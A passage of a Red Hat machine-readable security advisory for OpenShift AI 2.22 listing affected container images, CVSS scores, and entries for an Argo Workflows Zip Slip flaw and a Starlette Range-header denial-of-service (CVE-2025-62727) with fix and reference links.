"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/argoproj/argo-workflows: Argo Workflows Zip Slip"
},
{
"cve": "CVE-2025-62727",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"discovery_date": "2025-10-28T21:01:03.833849+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2406929"
}
],
"notes": [
{
"category": "description",
"text": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette DoS via Range header merging",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "RHBZ#2406929",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406929"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5",
"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
}
],
"release_date": "2025-10-28T20:14:53.655000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
